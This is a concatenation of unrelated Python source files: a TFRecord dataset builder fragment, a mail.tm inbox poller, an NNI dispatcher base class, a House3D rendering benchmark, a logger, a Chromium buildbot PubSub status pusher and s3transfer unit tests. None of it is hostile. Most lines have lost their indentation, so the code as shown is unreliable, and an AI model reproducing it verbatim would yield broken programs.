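  # the index file "<data_dir><data_sub>Images.txt"; labels are assigned from the
  # sorted sub-directory names under "<data_dir>Images".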
import glob
def mapping_name_to_label(dir_name):
a = dict()
index = 0
for name in sorted(glob.glob(dir_name + '/*')):
a[name.split('/')[-1]] = index
index += 1
return a
print('Determining list of input files and labels from %s.' % data_dir)
file_list = open(data_dir + data_sub + 'Images.txt').read().split('\n')
file_list.pop()
filenames = []
labels = []
mapping = mapping_name_to_label(data_dir + 'Images')
for filename in file_list:
label = mapping[filename.split('/')[0]]
labels.append(label)
if 'jpg' not in filename:
print(filename)
filenames.append(data_dir + 'Images/' + filename)
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(labels), data_dir))
return filenames, labels
def _process_dataset(name, directory, num_shards):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
"""
filenames, labels = _find_image_files(directory, name)
_process_image_files(name, filenames, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.test_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
      'FLAGS.test_shards')
if os.path.exists(FLAGS.output_directory) is not True:
os.mkdir(FLAGS.output_directory)
dir_name = '/home/jacques/workspace/database/MIT_Indoors_67/'
# Run it!
#_process_dataset('Train', dir_name, FLAGS.train_shards)
_process_dataset('Test', dir_name, FLAGS.test_shards)
if __name__ == '__main__':
tf.app.run()
|
message.py
|
import json
import time
from threading import Thread
class Listen:
listen = False
message_ids = []
def message_list(self):
url = "https://api.mail.tm/messages"
headers = { 'Authorization': 'Bearer ' + self.token }
response = self.session.get(url, headers=headers)
response.raise_for_status()
data = response.json()
return [
            msg for msg in data['hydra:member']
            if msg['id'] not in self.message_ids
]
def message(self, idx):
url = "https://api.mail.tm/messages/" + idx
headers = { 'Authorization': 'Bearer ' + self.token }
response = self.session.get(url, headers=headers)
response.raise_for_status()
return response.json()
def run(self):
while self.listen:
for message in self.message_list():
self.message_ids.append(message['id'])
message = self.message(message['id'])
self.listener(message)
time.sleep(self.interval)
def start(self, listener, interval=3):
if self.listen:
self.stop()
self.listener = listener
self.interval = interval
self.listen = True
# Start listening thread
self.thread = Thread(target=self.run)
self.thread.start()
def stop(self):
self.listen = False
self.thread.join()
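# Minimal usage sketch (illustrative; assumes the class using this mixin provides
# a requests-style `session` and a mail.tm bearer `token`):
#   inbox = Listen()
#   inbox.session, inbox.token = make_session(), fetch_token()  # hypothetical helpers
#   inbox.start(lambda msg: print(msg["subject"]), interval=5)
#   ...
#   inbox.stop()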
|
msg_dispatcher_base.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
# OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ==================================================================================================
#import json_tricks
import os
import threading
import logging
from multiprocessing.dummy import Pool as ThreadPool
from queue import Queue, Empty
import json_tricks
from .common import init_logger, multi_thread_enabled
from .recoverable import Recoverable
from .protocol import CommandType, receive
init_logger('dispatcher.log')
_logger = logging.getLogger(__name__)
QUEUE_LEN_WARNING_MARK = 20
_worker_fast_exit_on_terminate = True
class MsgDispatcherBase(Recoverable):
def __init__(self):
if multi_thread_enabled():
self.pool = ThreadPool()
self.thread_results = []
else:
self.stopping = False
self.default_command_queue = Queue()
self.assessor_command_queue = Queue()
self.default_worker = threading.Thread(target=self.command_queue_worker, args=(self.default_command_queue,))
self.assessor_worker = threading.Thread(target=self.command_queue_worker, args=(self.assessor_command_queue,))
self.default_worker.start()
self.assessor_worker.start()
self.worker_exceptions = []
def run(self):
"""Run the tuner.
        This function will never return unless an exception is raised.
"""
_logger.info('Start dispatcher')
mode = os.getenv('NNI_MODE')
if mode == 'resume':
self.load_checkpoint()
while True:
command, data = receive()
if data:
data = json_tricks.loads(data)
if command is None or command is CommandType.Terminate:
break
if multi_thread_enabled():
result = self.pool.map_async(self.process_command_thread, [(command, data)])
self.thread_results.append(result)
if any([thread_result.ready() and not thread_result.successful() for thread_result in self.thread_results]):
_logger.debug('Caught thread exception')
break
else:
self.enqueue_command(command, data)
_logger.info('Dispatcher exiting...')
self.stopping = True
if multi_thread_enabled():
self.pool.close()
self.pool.join()
else:
self.default_worker.join()
self.assessor_worker.join()
_logger.info('Terminated by NNI manager')
def command_queue_worker(self, command_queue):
"""Process commands in command queues.
"""
while True:
try:
# set timeout to ensure self.stopping is checked periodically
command, data = command_queue.get(timeout=3)
try:
self.process_command(command, data)
except Exception as e:
_logger.exception(e)
self.worker_exceptions.append(e)
break
except Empty:
pass
if self.stopping and (_worker_fast_exit_on_terminate or command_queue.empty()):
break
def enqueue_command(self, command, data):
"""Enqueue command into command queues
"""
if command == CommandType.TrialEnd or (command == CommandType.ReportMetricData and data['type'] == 'PERIODICAL'):
self.assessor_command_queue.put((command, data))
else:
self.default_command_queue.put((command, data))
qsize = self.default_command_queue.qsize()
if qsize >= QUEUE_LEN_WARNING_MARK:
_logger.warning('default queue length: %d', qsize)
qsize = self.assessor_command_queue.qsize()
if qsize >= QUEUE_LEN_WARNING_MARK:
_logger.warning('assessor queue length: %d', qsize)
def process_command_thread(self, request):
"""Worker thread to process a command.
"""
command, data = request
if multi_thread_enabled():
try:
self.process_command(command, data)
except Exception as e:
_logger.exception(str(e))
raise
else:
pass
def process_command(self, command, data):
_logger.debug('process_command: command: [{}], data: [{}]'.format(command, data))
command_handlers = {
            # Tuner commands:
CommandType.Initialize: self.handle_initialize,
CommandType.RequestTrialJobs: self.handle_request_trial_jobs,
CommandType.UpdateSearchSpace: self.handle_update_search_space,
CommandType.AddCustomizedTrialJob: self.handle_add_customized_trial,
            # Tuner/Assessor commands:
CommandType.ReportMetricData: self.handle_report_metric_data,
CommandType.TrialEnd: self.handle_trial_end,
CommandType.Ping: self.handle_ping,
}
if command not in command_handlers:
raise AssertionError('Unsupported command: {}'.format(command))
return command_handlers[command](data)
def handle_ping(self, data):
pass
def handle_initialize(self, data):
raise NotImplementedError('handle_initialize not implemented')
def handle_request_trial_jobs(self, data):
raise NotImplementedError('handle_request_trial_jobs not implemented')
def handle_update_search_space(self, data):
raise NotImplementedError('handle_update_search_space not implemented')
def handle_add_customized_trial(self, data):
raise NotImplementedError('handle_add_customized_trial not implemented')
def handle_report_metric_data(self, data):
raise NotImplementedError('handle_report_metric_data not implemented')
def handle_trial_end(self, data):
raise NotImplementedError('handle_trial_end not implemented')
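# Illustrative subclass sketch (assumed names, not part of this module): a concrete
# dispatcher implements the handle_* hooks that process_command routes to, e.g.
#   class MyDispatcher(MsgDispatcherBase):
#       def handle_initialize(self, data):
#           ...  # record the search space sent by the NNI manager
#       def handle_request_trial_jobs(self, data):
#           ...  # generate `data` new hyperparameter configurations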
|
benchmark-rendering-multiprocess.py
|
# Copyright 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import time
import os
import multiprocessing as mp
import argparse
import sys
import numpy as np
import cv2
from House3D import objrender, create_default_config
from House3D.objrender import Camera, RenderMode
def worker(idx, device, num_iter):
api = objrender.RenderAPI(args.width, args.height, device=device)
api.printContextInfo()
mappingFile = cfg['modelCategoryFile']
colormapFile = cfg['colorFile']
assert os.path.isfile(mappingFile) and os.path.isfile(colormapFile)
api.loadScene(args.obj, mappingFile, colormapFile)
cam = api.getCamera()
start = time.time()
for t in range(num_iter):
if t % 2 == 1:
api.setMode(RenderMode.RGB)
else:
api.setMode(RenderMode.SEMANTIC)
mat = np.array(api.render(), copy=False)
end = time.time()
print("Worker {}, speed {:.3f} fps".format(idx, num_iter / (end - start)))
if __name__ == '__main__':
"""
Usage:
./benchmark-rendering-multiprocess.py path/to/house.obj --num-proc 9 --num-gpu 3
Expected per-process speed with house: 00065ecbdd7300d35ef4328ffe871505, 120x90:
1. Tesla M40, EGL backend, nvidia375.39:
1proc, 1gpu: 690fps
3proc, 1gpu: 500x3fps
        5proc, 1gpu: 360x5fps (should see 99% GPU utilization here)
8proc, 8gpu: 650x8fps (roughly linear scaling)
2. GTX 1080Ti, nvidia387.34:
1proc: 1367fps
3proc: 1005x3fps
5proc: 680x5fps
3. Quadro GP100:
With EGL backend,nvidia384.81:
1proc, 1gpu: 700fps
3proc, 1gpu: 600x3fps
5proc, 1gpu: 500x5fps
"""
parser = argparse.ArgumentParser()
parser.add_argument('obj')
parser.add_argument('--num-proc', type=int, default=1)
parser.add_argument('--num-gpu', type=int, default=1)
parser.add_argument('--width', type=int, default=120)
parser.add_argument('--height', type=int, default=90)
parser.add_argument('--num-iter', type=int, default=5000)
args = parser.parse_args()
global cfg
cfg = create_default_config('.')
procs = []
for i in range(args.num_proc):
device = i % args.num_gpu
procs.append(mp.Process(target=worker, args=(i, device, args.num_iter)))
for p in procs:
p.start()
for p in procs:
p.join()
|
__main__.py
|
import contextlib
import os
import time
from threading import Thread
from tanit.master.client.factory import ClientType
from tanit.master.client.factory import ThriftClientFactory
from tanit.master.config.config import MasterConfig
from tanit.master.server.server import MasterServer
from tanit.worker.server.server import WorkerServer
from ..resources import conf
config_dir = os.path.dirname(os.path.abspath(conf.__file__))
@contextlib.contextmanager
def master_server():
server = MasterServer(config=config_dir)
server_daemon = Thread(target=server.start, args=())
server_daemon.setDaemon(True)
server_daemon.start()
# wait for the server to start
time.sleep(2.0)
yield
server.stop()
server_daemon.join()
@contextlib.contextmanager
def worker_server():
server = WorkerServer(config=config_dir)
server_daemon = Thread(target=server.start, args=())
server_daemon.setDaemon(True)
server_daemon.start()
# wait for the server to start
time.sleep(2.0)
yield
server.stop()
server_daemon.join()
@contextlib.contextmanager
def worker_client():
config = MasterConfig(path=config_dir)
factory = ThriftClientFactory(
config.worker_service_host, config.worker_service_port
)
client = factory.create_client(ClientType.WORKER_SERVICE)
client.start()
yield client
client.stop()
def main(argv=None):
with master_server():
with worker_server():
with worker_client() as client:
print(len(client.list_workers()))
if __name__ == "__main__":
main()
|
log.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 6 17:55:45 2017
@author: ahefny
"""
import threading
import time
import cPickle
import os
import os.path
class Logger:
_instance = None
def __init__(self):
self.global_tag = None
self.filter = lambda gtag,tag: True
self.log = []
self._file = None
self._lock = threading.Lock()
self._period = 5
self._active = True
self._save_thread = threading.Thread(target=self._save_loop)
self._save_thread.start()
def append(self, tag, value, print_out=False):
if self.filter(self.global_tag, tag):
# If value is a function, call it.
if callable(value):
value = value()
self._lock.acquire()
self.log.append((self.global_tag, tag, value))
self._lock.release()
if print_out:
print 'LOG[{}::{}]:'.format(self.global_tag, tag)
print value
def set_file(self, f):
assert self._file is None
        directory = os.path.dirname(f)
        if directory and not os.path.exists(directory):
            os.makedirs(directory)
self._file = open(f, 'wb')
#def is_main_thread_alive(self):
# for t in threading.enumerate():
# if t.name == 'MainThread':
# return t.is_alive()
def stop(self):
self._active = False
self._save_thread.join()
self._save()
if self._file is not None:
self._file.close()
def _save(self):
self._lock.acquire()
if self._file is not None:
for x in self.log:
cPickle.dump(x, self._file, protocol=2)
self.log = []
self._file.flush()
self._lock.release()
def _save_loop(self):
while self._active:
time.sleep(self._period)
self._save()
@classmethod
def instance(cls):
if Logger._instance is None:
Logger._instance = Logger()
return Logger._instance
if __name__ == '__main__':
log = Logger.instance()
test_file = '/tmp/psr_lite_log.pkl'
log.set_file(test_file)
log.append('test', 123, print_out=True)
    log._period = 1
time.sleep(2)
log.append('test', 456, print_out=True)
log.stop()
f = open(test_file, 'rb')
while True:
try:
print cPickle.load(f)
except EOFError:
break
f.close()
|
pubsub_json_status_push.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import ConfigParser
import contextlib
import Queue
import base64
import collections
import datetime
import functools
import httplib2
import json
import multiprocessing
import os
import time
import traceback
from apiclient import discovery
from buildbot.status.base import StatusReceiverMultiService
from master import auth
from master.deferred_resource import DeferredResource
from oauth2client import client as oauth2client
from twisted.internet import defer, reactor
from twisted.python import log
PUBSUB_SCOPES = ['https://www.googleapis.com/auth/pubsub']
def parent_is_alive():
"""Check For the existence of a unix pid.
Do a check if the parent process is still alive. If not then
put a None in the queue ourself so that the process terminates
after processing the backlog. (Linux only).
"""
if hasattr(os, 'getppid'):
try:
os.kill(os.getppid(), 0)
except OSError:
return False
else:
return True
# Default to saying the parent is alive, since we don't actually know.
return True
class exponential_retry(object):
"""Decorator which retries the function if an exception is encountered."""
def __init__(self, retries=None, delay=None):
self.retries = retries or 5
self.delay = delay or 1.0
def __call__(self, f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
retry_delay = self.delay
for i in xrange(self.retries):
try:
return f(*args, **kwargs)
except Exception as e:
if (i+1) >= self.retries:
raise
log.err('Exception %s encountered, retrying in %d second(s)\n%s' %
(e, retry_delay, traceback.format_exc()))
time.sleep(retry_delay)
retry_delay *= 2
return wrapper
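# A minimal usage sketch of exponential_retry (illustrative only; the
# '_example_get_topic' helper below is hypothetical and unused elsewhere in
# this module). Each failed attempt doubles the wait (1s, 2s, 4s, ...) and the
# final attempt re-raises the exception.
@exponential_retry(retries=3, delay=1.0)
def _example_get_topic(client, topic):
  # Same call shape PubSubClient uses to verify that a topic exists.
  return client.projects().topics().get(topic=topic).execute()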
class PubSubClient(object):
"""A client residing in a separate process to send data to PubSub.
This is separated from the main twistd reactor in order to shield the
main reactor from the increased load.
"""
def __init__(self, topic_url, service_account_file):
self.topic_url = topic_url
self.service_account_file = '/' + os.path.join(
'creds', 'service_accounts', service_account_file)
self.queue = multiprocessing.Queue()
self.runner = multiprocessing.Process(target=self._runner)
try:
self.credentials = auth.create_service_account_credentials(
self.service_account_file, scope=PUBSUB_SCOPES)
except auth.Error as e:
log.err(
'PubSub: Could not load credentials %s: %s.' % (
self.service_account_file, e))
raise e
self.client = self._create_pubsub_client(credentials=self.credentials)
# Check to see if the topic exists. Anything that's not a 200 means it
    # doesn't exist or is inaccessible.
@exponential_retry(retries=4, delay=1)
def _run():
# This blocks the twisted reactor but whatever, it's just the initial
# startup sequence.
self.client.projects().topics().get(topic=self.topic_url).execute()
_run()
log.msg('PubSub client for topic %s started' % self.topic_url)
self.runner.start()
def send(self, data):
self.queue.put(data)
def close(self):
self.queue.put(None)
self.runner.join(10)
if self.runner.is_alive():
# Can't possibly take that long to drain outstanding messages,
# just kill it.
self.runner.terminate()
self.runner.join()
@staticmethod
def _send_data(client, topic, data):
# TODO(hinoka): Sign messages so that they can be verified to originate
# from buildbot.
body = { 'messages': [{'data': base64.b64encode(data)}] }
log.msg('PubSub: Sending message to topic %s' % topic)
@exponential_retry(retries=4, delay=1)
def _run():
client.projects().topics().publish(topic=topic, body=body).execute()
_run()
log.msg('PubSub: Sending message to topic %s successful' % topic)
def _runner(self):
while True:
try:
try:
# Block, and timeout if it's exceeded 5 seconds.
data = self.queue.get(True, 5)
except Queue.Empty:
if not parent_is_alive():
log.msg('PubSub: Parent has died, exiting.')
self.queue.put(None)
continue
if data is None:
log.msg('PubSub: Received exit signal, quitting.')
break
try:
self._send_data(self.client, self.topic_url, data)
except Exception as e:
log.err('PubSub: Encountered error while sending data: %s' % e)
except Exception as e:
log.err('PubSub: Encountered error: %s' % e)
@staticmethod
def _create_pubsub_client(credentials=None, http=None):
"""Create a new configured pubsub client.
Copied from https://cloud.google.com/pubsub/configure
"""
    if http is None:
      http = httplib2.Http()
credentials.authorize(http)
return discovery.build('pubsub', 'v1', http=http)
# Annotation that wraps an event handler.
def event_handler(func):
"""Annotation to simplify 'StatusReceiver' event callback methods.
This annotation uses the wrapped function's name as the event name and
logs the event if the 'StatusPush' is configured to be verbose.
"""
status = func.__name__
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
if self.verbose:
log.msg('Status update (%s): %s %s' % (
status, args, ' '.join(['%s=%s' % (k, kwargs[k])
for k in sorted(kwargs.keys())])))
return func(self, *args, **kwargs)
return wrapper
class ConfigError(ValueError):
pass
class NotEnabled(Exception):
"""Raised when PubSub is purposely not enabled."""
_BuildBase = collections.namedtuple(
'_BuildBase', ('builder_name', 'build_number'))
class _Build(_BuildBase):
# Disable "no __init__ method" warning | pylint: disable=W0232
def __repr__(self):
return '%s/%s' % (self.builder_name, self.build_number)
class StatusPush(StatusReceiverMultiService):
"""
Periodically push builder status updates to pubsub.
"""
DEFAULT_PUSH_INTERVAL_SEC = 30
# Perform verbose logging.
verbose = False
@classmethod
def CreateStatusPush(cls, activeMaster, pushInterval=None):
assert activeMaster, 'An active master must be supplied.'
if not (
activeMaster.is_production_host or os.environ.get('TESTING_MASTER')):
log.msg(
'Not a production host or testing, not loading the PubSub '
'status listener.')
return None
topic_url = getattr(activeMaster, 'pubsub_topic_url', None)
if not topic_url:
log.msg('PubSub: Missing pubsub_topic_url, not enabling.')
return None
# Set the master name, for indexing purposes.
name = getattr(activeMaster, 'name', None)
if not name:
raise ConfigError(
'A master name must be supplied for pubsub push support.')
service_account_file = getattr(
activeMaster, 'pubsub_service_account_file', None)
if not service_account_file:
raise ConfigError('A service account file must be specified.')
return cls(topic_url, service_account_file, name, pushInterval)
def __init__(self, topic_url, service_account_file, name, pushInterval=None):
"""Instantiates a new StatusPush service.
Args:
topic_url: Pubsub URL to push updates to.
service_account_file: Credentials to use to push to pubsub.
pushInterval: (number/timedelta) The data push interval. If a number is
supplied, it is the number of seconds.
"""
StatusReceiverMultiService.__init__(self)
# Parameters.
self.pushInterval = self._getTimeDelta(pushInterval or
self.DEFAULT_PUSH_INTERVAL_SEC)
self.name = name # Master name, since builds don't include this info.
self.topic_url = topic_url
self._client = PubSubClient(self.topic_url, service_account_file)
self._status = None
self._res = None
self._updated_builds = set()
self._pushTimer = None
@staticmethod
def _getTimeDelta(value):
"""Returns: A 'datetime.timedelta' representation of 'value'."""
if isinstance(value, datetime.timedelta):
return value
elif isinstance(value, (int, long)):
return datetime.timedelta(seconds=value)
raise TypeError('Unknown time delta type; must be timedelta or number.')
def startService(self):
"""Twisted service is starting up."""
StatusReceiverMultiService.startService(self)
# Subscribe to get status updates.
self._status = self.parent.getStatus()
self._status.subscribe(self)
# Schedule our first push.
self._schedulePush()
@defer.inlineCallbacks
def stopService(self):
"""Twisted service is shutting down."""
self._clearPushTimer()
# Do one last status push.
yield self._doStatusPush(self._updated_builds)
# Stop our resource.
self._client.close()
@defer.inlineCallbacks
def _doStatusPush(self, updated_builds):
"""Pushes the current state of the builds in 'updated_builds'.
Args:
updated_builds: (collection) A collection of _Build instances to push.
"""
# If there are no updated builds, we're done.
if not updated_builds:
return
# Load all build information for builds that we're pushing.
builds = sorted(updated_builds)
if self.verbose:
      log.msg('PubSub: Pushing status for builds: %s' % (builds,))
loaded_builds = yield defer.DeferredList([self._loadBuild(b)
for b in builds])
send_builds = []
for i, build in enumerate(builds):
success, result = loaded_builds[i]
if not success:
log.err('Failed to load build for [%s]: %s' % (build, result))
continue
# result is a (build, build_dict) tuple.
_, send_build = result
send_build['master'] = self.name
send_builds.append(send_build)
# If there are no builds to send, do nothing.
if not send_builds:
return
# Send off the builds.
self._client.send(json.dumps(send_builds))
def _pushTimerExpired(self):
"""Callback invoked when the push timer has expired.
This function takes a snapshot of updated builds and begins a push.
"""
self._clearPushTimer()
# Collect this round of updated builds. We clear our updated builds in case
# more accumulate during the send interval. If the send fails, we will
# re-add them back in the errback.
updates = self._updated_builds.copy()
self._updated_builds.clear()
if self.verbose:
log.msg('PubSub: Status push timer expired. Pushing updates for: %s' % (
sorted(updates)))
# Upload them. Reschedule our send timer after this push completes. If it
# fails, add the builds back to the 'updated_builds' list so we don't lose
# them.
d = self._doStatusPush(updates)
def eb_status_push(failure, updates):
# Re-add these builds to our 'updated_builds' list.
log.err('Failed to do status push for %s: %s' % (
sorted(updates), failure))
self._updated_builds.update(updates)
d.addErrback(eb_status_push, updates)
def cb_schedule_next_push(ignored):
self._schedulePush()
d.addBoth(cb_schedule_next_push)
def _schedulePush(self):
"""Schedules the push timer to perform a push."""
if self._pushTimer:
return
if self.verbose:
log.msg('PubSub: Scheduling push timer in: %s' % (self.pushInterval,))
self._pushTimer = reactor.callLater(self.pushInterval.total_seconds(),
self._pushTimerExpired)
def _clearPushTimer(self):
"""Cancels any current push timer and clears its state."""
if self._pushTimer:
if self._pushTimer.active():
self._pushTimer.cancel()
self._pushTimer = None
def _loadBuild(self, b):
"""Loads the build dictionary associated with a '_Build' object.
Returns: (build, build_data), via Deferred.
build: (_Build) The build object that was loaded.
build_data: (dict) The build data for 'build'.
"""
builder = self._status.getBuilder(b.builder_name)
build = builder.getBuild(b.build_number)
return defer.succeed((b, build.asDict()))
def _recordBuild(self, build):
"""Records an update to a 'buildbot.status.build.Build' object.
Args:
build: (Build) The BuildBot Build object that was updated.
"""
build = _Build(
builder_name=build.builder.name,
build_number=build.number,
)
self._updated_builds.add(build)
#### Events
@event_handler
def builderAdded(self, _builderName, _builder):
return self
@event_handler
def buildStarted(self, _builderName, build):
self._recordBuild(build)
return self
@event_handler
def stepStarted(self, build, _step):
self._recordBuild(build)
return self
@event_handler
def buildFinished(self, _builderName, build, _results):
self._recordBuild(build)
|
test_utils.py
|
# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os.path
import shutil
import tempfile
import threading
import random
import re
import time
import io
from tests import mock, unittest, RecordingSubscriber, NonSeekableWriter
from s3transfer.compat import six
from s3transfer.futures import TransferFuture
from s3transfer.futures import TransferMeta
from s3transfer.utils import get_callbacks
from s3transfer.utils import random_file_extension
from s3transfer.utils import invoke_progress_callbacks
from s3transfer.utils import calculate_num_parts
from s3transfer.utils import calculate_range_parameter
from s3transfer.utils import get_filtered_dict
from s3transfer.utils import CallArgs
from s3transfer.utils import FunctionContainer
from s3transfer.utils import CountCallbackInvoker
from s3transfer.utils import OSUtils
from s3transfer.utils import DeferredOpenFile
from s3transfer.utils import ReadFileChunk
from s3transfer.utils import StreamReaderProgress
from s3transfer.utils import TaskSemaphore
from s3transfer.utils import SlidingWindowSemaphore
from s3transfer.utils import NoResourcesAvailable
from s3transfer.utils import ChunksizeAdjuster
from s3transfer.utils import MIN_UPLOAD_CHUNKSIZE, MAX_SINGLE_UPLOAD_SIZE
from s3transfer.utils import MAX_PARTS
class TestGetCallbacks(unittest.TestCase):
def setUp(self):
self.subscriber = RecordingSubscriber()
self.second_subscriber = RecordingSubscriber()
self.call_args = CallArgs(subscribers=[
self.subscriber, self.second_subscriber]
)
self.transfer_meta = TransferMeta(self.call_args)
self.transfer_future = TransferFuture(self.transfer_meta)
def test_get_callbacks(self):
callbacks = get_callbacks(self.transfer_future, 'queued')
# Make sure two callbacks were added as both subscribers had
# an on_queued method.
self.assertEqual(len(callbacks), 2)
# Ensure that the callback was injected with the future by calling
# one of them and checking that the future was used in the call.
callbacks[0]()
self.assertEqual(
self.subscriber.on_queued_calls,
[{'future': self.transfer_future}]
)
def test_get_callbacks_for_missing_type(self):
callbacks = get_callbacks(self.transfer_future, 'fake_state')
# There should be no callbacks as the subscribers will not have the
# on_fake_state method
self.assertEqual(len(callbacks), 0)
class TestGetFilteredDict(unittest.TestCase):
def test_get_filtered_dict(self):
original = {
'Include': 'IncludeValue',
            'NotInclude': 'NotIncludeValue'
}
whitelist = ['Include']
self.assertEqual(
get_filtered_dict(original, whitelist),
{'Include': 'IncludeValue'}
)
class TestCallArgs(unittest.TestCase):
def test_call_args(self):
call_args = CallArgs(foo='bar', biz='baz')
self.assertEqual(call_args.foo, 'bar')
self.assertEqual(call_args.biz, 'baz')
class TestFunctionContainer(unittest.TestCase):
def get_args_kwargs(self, *args, **kwargs):
return args, kwargs
def test_call(self):
func_container = FunctionContainer(
self.get_args_kwargs, 'foo', bar='baz')
self.assertEqual(func_container(), (('foo',), {'bar': 'baz'}))
def test_repr(self):
func_container = FunctionContainer(
self.get_args_kwargs, 'foo', bar='baz')
self.assertEqual(
str(func_container), 'Function: %s with args %s and kwargs %s' % (
self.get_args_kwargs, ('foo',), {'bar': 'baz'}))
class TestCountCallbackInvoker(unittest.TestCase):
def invoke_callback(self):
self.ref_results.append('callback invoked')
def assert_callback_invoked(self):
self.assertEqual(self.ref_results, ['callback invoked'])
def assert_callback_not_invoked(self):
self.assertEqual(self.ref_results, [])
def setUp(self):
self.ref_results = []
self.invoker = CountCallbackInvoker(self.invoke_callback)
def test_increment(self):
self.invoker.increment()
self.assertEqual(self.invoker.current_count, 1)
def test_decrement(self):
self.invoker.increment()
self.invoker.increment()
self.invoker.decrement()
self.assertEqual(self.invoker.current_count, 1)
def test_count_cannot_go_below_zero(self):
with self.assertRaises(RuntimeError):
self.invoker.decrement()
def test_callback_invoked_only_once_finalized(self):
self.invoker.increment()
self.invoker.decrement()
self.assert_callback_not_invoked()
self.invoker.finalize()
# Callback should only be invoked once finalized
self.assert_callback_invoked()
def test_callback_invoked_after_finalizing_and_count_reaching_zero(self):
self.invoker.increment()
self.invoker.finalize()
# Make sure that it does not get invoked immediately after
# finalizing as the count is currently one
self.assert_callback_not_invoked()
self.invoker.decrement()
self.assert_callback_invoked()
def test_cannot_increment_after_finalization(self):
self.invoker.finalize()
with self.assertRaises(RuntimeError):
self.invoker.increment()
class TestRandomFileExtension(unittest.TestCase):
def test_has_proper_length(self):
self.assertEqual(
len(random_file_extension(num_digits=4)), 4)
class TestInvokeProgressCallbacks(unittest.TestCase):
def test_invoke_progress_callbacks(self):
recording_subscriber = RecordingSubscriber()
invoke_progress_callbacks([recording_subscriber.on_progress], 2)
self.assertEqual(recording_subscriber.calculate_bytes_seen(), 2)
def test_invoke_progress_callbacks_with_no_progress(self):
recording_subscriber = RecordingSubscriber()
invoke_progress_callbacks([recording_subscriber.on_progress], 0)
self.assertEqual(len(recording_subscriber.on_progress_calls), 0)
class TestCalculateNumParts(unittest.TestCase):
def test_calculate_num_parts_divisible(self):
self.assertEqual(calculate_num_parts(size=4, part_size=2), 2)
def test_calculate_num_parts_not_divisible(self):
self.assertEqual(calculate_num_parts(size=3, part_size=2), 2)
class TestCalculateRangeParameter(unittest.TestCase):
def setUp(self):
self.part_size = 5
self.part_index = 1
self.num_parts = 3
    def test_calculate_range_parameter(self):
range_val = calculate_range_parameter(
self.part_size, self.part_index, self.num_parts)
self.assertEqual(range_val, 'bytes=5-9')
def test_last_part_with_no_total_size(self):
range_val = calculate_range_parameter(
self.part_size, self.part_index, num_parts=2)
self.assertEqual(range_val, 'bytes=5-')
def test_last_part_with_total_size(self):
range_val = calculate_range_parameter(
self.part_size, self.part_index, num_parts=2, total_size=8)
self.assertEqual(range_val, 'bytes=5-7')
class BaseUtilsTest(unittest.TestCase):
def setUp(self):
self.tempdir = tempfile.mkdtemp()
self.filename = os.path.join(self.tempdir, 'foo')
self.content = b'abc'
with open(self.filename, 'wb') as f:
f.write(self.content)
self.amounts_seen = []
self.num_close_callback_calls = 0
def tearDown(self):
shutil.rmtree(self.tempdir)
def callback(self, bytes_transferred):
self.amounts_seen.append(bytes_transferred)
def close_callback(self):
self.num_close_callback_calls += 1
class TestOSUtils(BaseUtilsTest):
def test_get_file_size(self):
self.assertEqual(
OSUtils().get_file_size(self.filename), len(self.content))
def test_open_file_chunk_reader(self):
reader = OSUtils().open_file_chunk_reader(
self.filename, 0, 3, [self.callback])
# The returned reader should be a ReadFileChunk.
self.assertIsInstance(reader, ReadFileChunk)
# The content of the reader should be correct.
self.assertEqual(reader.read(), self.content)
        # Callbacks should be disabled despite being passed in.
self.assertEqual(self.amounts_seen, [])
def test_open_file_chunk_reader_from_fileobj(self):
with open(self.filename, 'rb') as f:
reader = OSUtils().open_file_chunk_reader_from_fileobj(
f, len(self.content), len(self.content), [self.callback])
# The returned reader should be a ReadFileChunk.
self.assertIsInstance(reader, ReadFileChunk)
# The content of the reader should be correct.
self.assertEqual(reader.read(), self.content)
reader.close()
            # Callbacks should be disabled despite being passed in.
self.assertEqual(self.amounts_seen, [])
self.assertEqual(self.num_close_callback_calls, 0)
def test_open_file(self):
fileobj = OSUtils().open(os.path.join(self.tempdir, 'foo'), 'w')
self.assertTrue(hasattr(fileobj, 'write'))
